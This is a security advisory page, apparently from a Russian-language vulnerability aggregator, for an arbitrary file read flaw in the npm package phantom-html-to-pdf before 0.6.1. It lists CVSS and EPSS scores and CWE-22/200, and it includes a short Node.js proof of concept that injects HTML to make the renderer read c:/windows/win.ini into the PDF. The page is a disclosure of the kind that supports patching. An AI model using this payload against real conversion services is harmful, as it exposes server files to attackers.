Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-6h7f-qwqm-35pp

Опубликовано: 06 нояб. 2020
Источник: github
Github: Прошло ревью
CVSS3: 7.5

Описание

Arbitrary File Read in phantom-html-to-pdf

This affects the package phantom-html-to-pdf before 0.6.1.

PoC

var fs = require('fs') var conversion = require("phantom-html-to-pdf")(); conversion.allowLocalFilesAccess = false conversion({ html: "document.write(window.location='c:/windows/win.ini')" }, function(err, pdf) { var output = fs.createWriteStream('output.pdf') console.log(pdf.logs); console.log(pdf.numberOfPages); pdf.stream.pipe(output); });

Пакеты

Наименование

phantom-html-to-pdf

npm
Затронутые версииВерсия исправления

< 0.6.1

0.6.2

EPSS

Процентиль: 60%
0.00405
Низкий

7.5 High

CVSS3

Дефекты

CWE-200
CWE-22

Связанные уязвимости

CVSS3: 7.5
nvd
больше 5 лет назад

This affects the package phantom-html-to-pdf before 0.6.1.

EPSS

Процентиль: 60%
0.00405
Низкий

7.5 High

CVSS3

Дефекты

CWE-200
CWE-22